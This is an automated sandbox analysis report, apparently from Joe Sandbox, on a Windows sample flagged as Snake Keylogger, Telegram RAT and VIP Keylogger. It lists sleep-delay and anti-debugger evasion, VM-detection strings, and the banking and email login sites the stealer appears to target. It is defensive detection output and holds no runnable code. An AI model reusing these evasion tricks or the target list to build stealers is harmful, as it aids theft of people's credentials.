Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597858	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597201	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596867	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596614	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596371	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596251	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596107	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594777	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Window / User API: threadDelayed 2550			Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Window / User API: threadDelayed 6595			Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668	Thread sleep count: 79 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668	Thread sleep count: 158 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7892	Thread sleep count: 2550 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7892	Thread sleep count: 6595 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -599670s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -599544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -599398s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -599166s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -599061s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598952s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598185s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597858s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597201s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -596867s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -596614s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -596371s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -596251s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -596107s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -594999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -594777s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -594671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888	Thread sleep time: -594562s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599670	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599398	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599166	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599061	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598624	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597858	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597201	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596867	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596614	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596371	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596251	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 596107	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594777	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: x8M2g1Xxhz.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3793643274.000000000094D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: x8M2g1Xxhz.exe	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd329d9dfe367a<
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Open window title or class name: ollydbg

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: NTICE
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: SICE
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Code function: 0_2_0043C0CD rdtsc

0_2_0043C0CD

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Code function: 0_2_08309178 LdrInitializeThunk,

0_2_08309178

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: x8M2g1Xxhz.exe, 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Managerh
Source: x8M2g1Xxhz.exe, x8M2g1Xxhz.exe, 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
